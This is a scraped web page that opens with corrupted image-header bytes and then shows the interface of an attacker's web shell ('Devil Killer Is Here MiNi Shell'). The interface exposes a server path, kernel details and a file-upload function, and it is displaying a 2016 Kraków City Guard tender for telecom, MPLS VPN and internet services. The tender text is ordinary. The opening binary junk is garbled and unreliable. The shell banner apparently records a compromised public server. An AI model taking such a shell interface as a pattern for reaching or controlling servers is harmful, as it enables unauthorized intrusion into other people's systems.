JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160303/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160303/47886-N-2016.html

<p class="kh_header"><b>Kraków: Świadczenie usług telekomunikacyjnych i dostępu do internetu</b><br>
<b>Numer ogłoszenia: 47886 - 2016; data zamieszczenia: 03.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Straż Miejska Miasta Krakowa , ul. Dobrego Pasterza 116, 31-416 Kraków, woj. małopolskie, tel. 12 68 82 154, faks 12 68 82 292.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.krakow.pl/ST</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług telekomunikacyjnych i dostępu do internetu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi telekomunikacyjne, które zapewnią:
1. Transmisję danych pomiędzy siedzibami Straży Miejskiej Miasta Krakowa.
2. Łączność telefoniczną.
3. Stały dostęp do internetu.
Ad1. Transmisja danych pomiędzy siedzibami Straży Miejskiej Miasta Krakowa
Zamawiający wymaga zastosowania tylko technologii przewodowej światłowodowej. 
Dopuszcza jedynie zastosowanie innego rodzaju łącza dla lokalizacji Plac Wszystkich Świętych 3-4 w Krakowie. Zastosowanie łącza radiowego w tej lokalizacji dopuszczone jest pod warunkiem, iż będą wykorzystywane częstotliwości wyłącznie w paśmie 
koncesjonowanym i będą wykonane wyłącznie na własnych zasobach.
Przedmiotem zamówienia są usługi transmisji danych IP VPN z wykorzystaniem 
technologii MPLS dla Straży Miejskiej Miasta Krakowa, łączącej wszystkie siedziby 
z budynkiem głównym w jedną sieć Intranet w skład, której wchodzą:
a) lokalizacja centralna (budynek główny) umiejscowiona przy ul. Dobrego Pasterza 116 w Krakowie odpowiedzialna głównie za agregację ruchu z pozostałych 
7 lokalizacji,
b) 6 lokalizacji zdalnych (siedziby oddziałów) rozmieszczonych na terenie miasta 
Krakowa, pod następującymi adresami:
ul. Stachiewicza 3,
os. Centrum C 9,
ul. Na Kozłówce 25,
ul. Cechowa 19,
ul. Walerego Sławka 10,
os. Na Stoku 1.
c) lokalizacja zdalna (siedziby Referatu) znajdującej się w budynku Urzędu Miasta Krakowa, pl. Wszystkich Świętych 3-4 w Krakowie.
Wykonawca usług jest zobowiązany do instalacji i uruchomienia łączy dostępowych tylko w technologii przewodowej światłowodowej dla: 
-lokalizacji centralnej wymienionej w pkt a - usługa transmisji danych łączem 
symetrycznym gwarantowanym o przepustowości 40 Mb/s
-6 lokalizacji zdalnych wymienionych w pkt b - usługa transmisji danych łączem symetrycznym gwarantowanym o przepustowości 10 Mb/s 
Wykonawca usług jest zobowiązany do instalacji i uruchomienia łączy dostępowych 
dla lokalizacji zdalnej wymienionej w pkt c - usługa transmisji danych łączem 
symetrycznym gwarantowanym o przepustowości 4 Mb/s - do miejsca w budynku Urzędu Miasta Krakowa, pl. Wszystkich Świętych 3-4 w Krakowie, wskazanego przez 
Zamawiającego.
Transmisja danych będzie umożliwiała komunikację pomiędzy każdą z lokalizacji tzn. 
w układzie <każdy z każdym> tak, aby połączenia były nawiązywane bezpośrednio 
pomiędzy wszystkim 8 lokalizacjami.
Wymagane jest, aby oferowana usługa MPLS zapewniała pełną gwarancję pasma 
i  wsparcie  dla  jakości  usług  Quality  of  Service  (QoS)  oraz  klas  usług  Class  
of Service  (CoS)  wraz  z  możliwością  bezpłatnych zmian  parametrów  dla  klas  
usługowych (głos, aplikacje, dane).
Sposób priorytetyzacji pakietów IP (przydziału do klas CoS) na podstawie adresów IP, numerów portów TCP/UDP, wartości DSCP i IP Precedence, analizy na poziomie 
aplikacyjnym  lub dowolnej ww. kombinacji, zostanie uzgodnione z przedstawicielami Zamawiającego na etapie inicjowania projektu wdrożeniowego.
Usługa IP VPN/MPLS musi zapewniać transmisję danych z wykorzystaniem minimum 
3 klas ruchu CoS we wszystkich lokalizacjach. 
Z dniem uruchomienia usług tj. 1 listopada 2016 roku Wykonawca dostarczy usługę IPVPN MPLS z trzema klasami ruchu (Class of service, CoS): 
Klasa A. Klasa voice, dedykowana dla komunikacji głosowej, 
Klasa B. Klasa dane 1, dedykowana dla aplikacji krytycznych, 
Klasa C. Klasa dane 2, dedykowana dla pozostałych aplikacji (dostęp do Internetu).
Wymagane jest, aby zmiany w rozdziale pasm na liczbę dostępnych klas, ograniczenia przepustowości dla wskazanych klas i sposób priorytetyzacji pakietów IP były procesem elastycznym i bezpłatnym, wykonywanym wyłącznie na zlecenie Zamawiającego. 
Zlecenia w/w zmian będą przekazywane Wykonawcy za pomocą poczty elektronicznej 
(e-mail) przez upoważnionych pracowników Zamawiającego, a czas realizacji nie będzie przekraczał 5 dni roboczych, od momentu otrzymania zlecenia. Zamawiający 
nie przewiduje wprowadzeniu więcej, niż pięciu zmian dla każdego portu w okresie 
trwania umowy.
Zamawiający nie dopuszcza zmian adresacji sieci LAN w swoich lokalizacjach. 
Zamawiający wskaże parametry techniczne obecnie istniejącej sieci do przeniesienia 
do nowo tworzonej.
Zaproponowane rozwiązanie powinno zapewniać:
-prywatność i wysoki poziom bezpieczeństwa oraz izolację różnych VPN 
konfigurowanych przez Wykonawcę usług. Wykonawca nie będzie w żadnym miejscu sieci, będącej przedmiotem zamówienia i służącej do transmisji danych 
Zamawiającego, używał zasobów ogólnodostępnej sieci Internet, ogólnodostępnych sieci bezprzewodowych, połączeń telefonicznych publicznych sieci komórkowych GSM oraz połączeń telefonicznych publicznych sieci przewodowych;
-brak ograniczeń, co do rodzaju przesyłanych danych.
Wykonawca w ramach usługi zapewni jakość usług określonych w tabeli nr 1 i 2 
(poniżej), dla wszystkich lokalizacji.
Wykonawca zobowiązuje się do zachowania parametrów jakościowych świadczonej 
usługi, przy założeniu obciążenia pasma poniżej 80%, dla podłączonych lokalizacji 
według warunków określonych w tabeli. 
Tabele 1. i 2. określające parametry jakościowe i parametry czasowe pominięto w ogłoszeniu. Są zamieszczone w Specyfikacji istotnych warunków zamówienia, dostępnej na stronie internetowej Zamawiającego.
Raporty
Zamawiający wymaga dostępu on-line do danych w systemie Wykonawcy w celu 
weryfikacji i potwierdzenia jakości dostarczonych usług. Dostęp do danych statystycznych z podziałem na lokalizacje (po adresie IP  lub adresie lokalizacji usługi).
System udostępni w formie graficznej i tabelarycznej m. in. następujące parametry sieci 
i urządzeń końcowych (routerów CE) w trybie on-line (odświeżanie danych nie rzadsze, niż co 5 minut):  
-topologii sieci z nazwami routerów CE i adresami IP portów Ethernet, 
-statystyki pracy routerów CE (dostępności, ilość i długość przerw w pracy, utraty 
pakietów, pakiety odrzucone, opóźnienia pakietów itp.), 
-statusy łączy, 
-informacje o czasie usterek i awarii - data, czas, 
-możliwość generowania dobowych, miesięcznych i rocznych raportów z parametrów 
jakościowych i czasowych (SLA).
Ad2. Łączność telefoniczna 
Zamawiający wyklucza stosowanie łączy bezprzewodowych
Wykonawca zapewni łączność telefoniczną w zakresie połączeń telefonicznych lokalnych, strefowych, międzystrefowych, międzynarodowych, do sieci komórkowych, z numerami specjalnymi itp. przy pomocy:
a. 2 linii cyfrowych ISDN 2B+D, 
b. 1 linii ISDN PRA 30B+D (200 DDI).
c. 1 linii analogowej (PSTN).
Ruch połączeń wychodzących odbywa się poprzez centralę telefoniczną głównie przez 
łącze PRA według poniższej szacunkowej ilości:
a. lokalne i strefowe - ok. 5000 min/mies.,
b. międzystrefowe - ok. 1000 min/mies.,
c. do sieci komórkowych - ok. 60 min/mies., w tym:
-do sieci Plus, Orange i T-Mobile - 50 min/mies.,
-do sieci Play, Polsat i pozostałych - 10 min/mies.,
d. międzynarodowe - ok. 3 min/mies. 
Podane  ilości  minut  należy  traktować  jako szacunkowe  i  nie  stanowiące 
zobowiązania Zamawiającego do utrzymania podanej struktury ruchu w czasie realizacji umowy.
Wymagania:
1.Zamawiający wymaga zachowania dotychczasowych numeracji na wszystkich 
liniach. Wykaz numerów telefonów wraz z lokalizacjami:
2 linie cyfrowe ISDN 2B+D
     124110045, 124137703- ul. Dobrego Pasterza 116
1 linia cyfrowa ISDN 30B+D
     126882100 (200DDI /100-299/) - ul. Dobrego Pasterza 116
1 linia analogowa 
     124138829, - ul. Dobrego Pasterza 116
2.Wszystkie linie są podłączone do centrali telefonicznej będącej w posiadaniu 
Zamawiającego. Centrala Telefoniczna Alcatel - OmniPCX Enterprise. Wykonawca zapewni pełną integrację usług oraz zainstalowanych urządzeń z tą centralą.
3.Usługi, których koszt nie został określony w ofercie, realizowane będą za cenę 
nie wyższą, niż ustalona w publicznej, ogólnodostępnej ofercie Wykonawcy dla danej usługi (oferta obowiązująca w dniu podpisania umowy). 
4.Jedna i jednolita (bez względu na porę dnia) dla wszystkich numerów telefonicznych stawka za połączenia do krajowych sieci stacjonarnych (bez względu, czy są 
to połączenia lokalne, strefowe czy międzystrefowe).
5.Zapewnione zostanie sekundowe naliczanie czasu realizowanych rozmów 
telefonicznych w każdym rodzaju ruchu bez naliczania opłaty początkowej 
(nie dopuszcza się taryf zawierających jakiekolwiek opłaty za inicjację połączenia).
6.możliwość wykonywania bezpłatnych połączeń na numery alarmowe - (np. 112, 997, 998, 999)
7.Zamawiający nie dopuszcza stosowania technologii alternatywnej VOIP, numery 
dostępowe, bramki GSM  jako pośredniej do realizacji usług głosowych.
8.Usługi muszą być świadczone zgodnie z obowiązującymi przepisami, a parametry  techniczne  łączy,  linii  telekomunikacyjnych,  na  których  świadczony  będzie 
dostęp  do  usług  telekomunikacyjnych, muszą  być  zgodne z obowiązującymi 
normami przez cały czas obowiązywania umowy.
9.Zamawiający będzie ponosił tylko opłaty za faktycznie zrealizowane połączenia. 
Maksymalny czas usunięcia awarii - 12 godzin zegarowych, maksymalny czas reakcji 
na awarię - 2 godziny, gotowość służb technicznych do usunięcia awarii przez 24 godziny na dobę we wszystkie dni roku.
Ad3.Stały dostęp do internetu
Zamawiający wyklucza stosowanie łączy bezprzewodowych.
Wykonawca będzie świadczył na rzecz Zamawiającego usługi stałego dostępu do internetu w lokalizacji - ul. Dobrego Pasterza 116, bez limitu czasu i przesyłanych danych 
o następujących parametrach:
a. dostęp symetryczny gwarantowany o przepustowości min 100 Mb/s; minimum cztery stałe adresy IP z puli adresów publicznych; instalacja na linii dedykowanej 
(bez korzystania z usługi telefonicznej); usługa zakończona urządzeniem końcowym umożliwiającym podłączenie bezpośrednio do sieci LAN Zamawiającego; 
Zamawiający wymaga zastosowania łącza przewodowego światłowodowego;
b. dostęp w technologii ADSL - łącze o przepustowości min 10/1 Mb/s do/od sieci 
Zamawiającego; dynamicznie przydzielany adres IP; instalacja na linii PSTN 
wskazanej przez Zamawiającego - dopuszczalna jest instalacja na linii dedykowanej (bez korzystania z usługi telefonicznej) pod warunkiem, iż następuje to po innej sieci, 
niż zaproponowany dostęp z pkt a.;  usługa zakończona urządzeniem końcowym, 
umożliwiającym podłączenie usługi do sieci LAN Zamawiającego.
Maksymalny czas usunięcia awarii - 12 godzin zegarowych, maksymalny czas reakcji 
na awarię - 2 godziny, gotowość służb technicznych do usunięcia awarii przez 24 godziny na dobę we wszystkie dni roku.
Pozostałe kryteria dla całości zamówienia
a. Wykonawca musi zapewnić możliwość podłączenia (na zasadzie bezpłatnego 
przeniesienia z istniejącej) wskazanych usług do innej, dowolnej lokalizacji na terenie Krakowa - w miarę posiadanych warunków technicznych, dopuszczone jest 
zastosowanie innych łączy niż światłowodowych.
b. W ramach świadczenia usług Wykonawca dostarczy wymagany końcowy sprzęt 
aktywny dla wszystkich lokalizacji Zamawiającego. Wyżej wymieniony końcowy sprzęt pozostaje własnością Wykonawcy, wypożyczony Zamawiającemu na czas świadczenia usługi oraz będzie przez niego zarządzany przez okres realizacji 
Przedmiotu zamówienia. Miejscem dostarczenia usługi będą pomieszczenia, w których 
zainstalowane będą urządzenia końcowe. Są to pomieszczenia techniczne, w których zlokalizowane są węzły telekomunikacyjne Zamawiającego.
c. Wykonawca odpowiada za sprawne przejęcie wszystkich danych (numerów 
telefonicznych, adresację sieci LAN Zamawiającego z danej lokalizacji itp.) 
oraz uzyskanie wszystkich pozwoleń i opinii niezbędnych do realizacji przedmiotu 
zamówienia (ze szczególnym zwróceniem uwagi na budynek Centrum C9 w Krakowie,  
oraz na budynek przy placu Wszystkich Świętych 3-4 w Krakowie, dla których, 
w przypadku konieczności umieszczenia na nich urządzeń, wymagana jest opinia 
Miejskiego Konserwatora Zabytków oraz na budynek przy ul. Cechowej 19, wpisany do gminnej ewidencji zabytków).
d. Wykonawca ponosi wszelkie inne koszty związane z realizacją przedmiotu 
zamówienia.
e. Wszelkie prace modernizacyjne w sieci Wykonawcy, muszą być zgłaszane 
i uzgadniane z Zamawiającym na minimum 3 dni robocze przed rozpoczęciem tych prac.
f. Obecny Operator usług to Netia S.A. W przypadku innego operatora niż obecny, 
Wykonawca przeprowadzi, bez powodowania przerw w pracy, bezpłatnie procedurę przeniesienia wszelkich wymaganych parametrów do własnej sieci. W przypadku 
konieczności, gdy nie będzie możliwe przeniesienie usług bez jakiejkolwiek przerwy 
w ich świadczeniu, fakt ten należy uzgodnić odpowiednio wcześniej z Zamawiającym w zakresie terminu, czasu i długości tej przerwy.
g. Każda instalacja zakończona będzie podpisaniem stosownego protokołu (wzór 
protokołu określony zostanie z wybranym w postępowaniu Wykonawcą).
h. Wszelkie koszty funkcjonowania serwisu ponosi Wykonawca.
i. Zamawiający udostępni nieodpłatnie, dla realizacji przedmiotu zamówienia: zasilanie elektryczne, miejsce w serwerowni i w szafach teleinformatycznych. 
j. Szczegółowe postanowienia dotyczące trybu postępowania reklamacyjnego zawierać powinny stosowne Regulaminy świadczenia usług telekomunikacyjnych stanowiące 
załączniki do umowy, przy założeniu pierwszeństwa zapisów SIWZ oraz umowy.
k. Zamawiający wymaga uruchomienia usług od 1 listopada 2016 r. Wymagany okres świadczenia usługi do 31 października 2019 r. z zastrzeżeniem, że umowa (wskazane umowy) ulegnie (ulegną) wcześniejszemu rozwiązaniu z chwilą osiągnięcia w sumie 
maksymalnej wartości umownej brutto w wysokości ..................... zł.
l. Dla potrzeb wykonania testów, pomiarów i konfiguracji, Zamawiający wymaga, 
by usługa została uruchomiana na min 5 dni roboczych przed dniem 1 listopada 2016 roku bez naliczana za ten okres jakichkolwiek opłat.
m. Dostarczanie faktury (faktur) dla wszystkich usług za dany okres rozliczeniowy 
tj. od 1 do ostatniego dnia każdego miesiąca. Faktura powinna zawierać 
wyszczególnione pozycje z poszczególnymi rodzajami usług..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 64.21.00.00-1, 72.40.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca składający ofertę zobowiązany jest do wniesienia, przed upływem 
terminu składania ofert, wadium w wysokości: 10 000,00 zł (słownie: dziesięć tysięcy 
złotych 00/100);
2.	Wadium może być wnoszone w jednej lub kilku formach, wymienionych 
w art. 45 ust. 6 ustawy Pzp, przy czym wadium wnoszone w pieniądzu należy 
wpłacić:
- 	przelewem na rachunek Zamawiającego nr 84 1020 2892 0000 5202 0592 5351, prowadzony w Banku PKO BP S.A., (o zachowaniu terminu wniesienia wadium w formie pieniądza decyduje termin wpływu środków na rachunek 
Zamawiającego),
-	wadium może być wpłacone wyłącznie w złotych (PLN).
3.	Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, 
gwarancji ubezpieczeniowej lub poręczenia udzielanego przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 ze zm.), należy wnieść poprzez dołączenie oryginału odpowiednich dokumentów do oferty.
Wnoszone jako wadium poręczenie lub gwarancja muszą być bezwarunkowe, płatne na każde pisemne żądanie zgłoszone przez Zamawiającego, muszą 
obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, o których mowa w art. 46 ust. 4 a i 5 ustawy Pzp, oraz obejmować cały okres związania Wykonawcy ofertą określony w SIWZ. 
4.	Zamawiający dokona zwrotu wadium, zgodnie z przepisami ustawy Pzp lub 
zatrzyma je w okolicznościach określonych w art. 46 ust. 5 ustawy Pzp. 
5.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca 
w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złoży 
dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp 
lub pełnomocnictw, chyba że udowodni, iż wynika to z przyczyn nie leżących 
po jego stronie.
6.	Wadium Wykonawcy, którego oferta została wybrana zostanie zatrzymane wraz
z odsetkami, w przypadku, gdy: 
1.	Wykonawca odmówi podpisania umowy w sprawie zamówienia publicznego 
na warunkach określonych w ofercie,
2.		zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe, 
z przyczyn leżących po stronie Wykonawcy.
7.	Wadium wniesione w pieniądzu, Zamawiający przechowuje na rachunku 
bankowym i zwróci je wraz z odsetkami wynikającymi z umowy rachunku 
bankowego, pomniejszone o koszty prowadzenia rachunku bankowego 
oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy, wskazany przez Wykonawcę.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda przedłożenia zaświadczenia, o dokonaniu wpisu do rejestru przedsiębiorców telekomunikacyjnych prowadzonego przez Prezesa Urzędu 
Komunikacji Elektronicznej (potwierdzoną przez Wykonawcę za zgodność 
z oryginałem kopię zaświadczenia).    
	Ocena spełnienia ww. warunku nastąpi metodą spełnia/nie spełnia na podstawie 
załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnienie 
warunków określonych w art. 22 ust. 1 ustawy Pzp, zgodnie z załącznikiem 
nr 2 do SIWZ oraz na podstawie złożonego zaświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca wykazał się zrealizowaniem, w okresie 
ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres 
prowadzenia działalności jest krótszy - w tym okresie, co najmniej trzech usług,
o podobnym (zbliżonym) charakterze, rodzajowo odpowiadającego  przedmiotowi zamówienia, na kwotę co najmniej 100 000 zł (sto tysięcy zł) brutto każda.
Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty:
-  oświadczenia Wykonawcy potwierdzającego spełnienie warunków określonych 
w art. 22 ust. 1 ustawy Pzp, zgodnie z załącznikiem nr 2 do SIWZ.  
- wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych 
również wykonywanych, głównych usług w okresie ostatnich trzech lat przed 
upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest 
krótszy - w tym okresie, wraz z określeniem przedmiotu, dat wykonania 
i podmiotów, na rzecz których usługi zostały lub są wykonywane, zgodnie 
ze wzorem stanowiącym załącznik nr 4 do SIWZ,
-  dowodów potwierdzających, że usługi ujęte w wykazie zostały wykonane
należycie, przy czym dowodem może być:
a) poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług 
okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej, 
niż na 3 miesiące przed upływem terminu składania ofert;
b) oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn 
o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać 
poświadczenia, o którym mowa pod lit. a).
Wykonawca nie ma obowiązku przedkładania powyższych dowodów, 
w przypadku gdy podmiotem, na rzecz którego usługi wskazane w wykazie 
zostały wcześniej wykonane, jest Zamawiający. Stosownie do treści § 1 ust. 4 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie 
dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2013 r., poz. 231 - dalej 
<Rozporządzenie w sprawie dokumentów>), obowiązek wskazania głównych 
usług w wykazie i przedstawienia dowodów ich należytego wykonania dotyczy 
jedynie usług wymaganych w pkt III SIWZ. 
W razie konieczności, w szczególności gdy wykaz lub dowody, o których mowa 
powyżej, będą budzić wątpliwości Zamawiającego lub gdy z poświadczenia 
albo z innego dokumentu wynikać będzie, że zamówienie nie zostało wykonane 
lub zostało wykonane nienależycie, Zamawiający może zwrócić się  bezpośrednio 
do właściwego podmiotu, na rzecz którego usługi były lub miały zostać 
wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio 
Zamawiającemu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnego szczególnego warunku.
Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty 
oświadczenia Wykonawcy potwierdzającego spełnienie warunków określonych              w art. 22 ust. 1 ustawy Pzp, zgodnie z załącznikiem nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnego szczególnego warunku.
Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty 
oświadczenia Wykonawcy potwierdzającego spełnienie warunków określonych              w art. 22 ust. 1 ustawy Pzp, zgodnie z załącznikiem nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
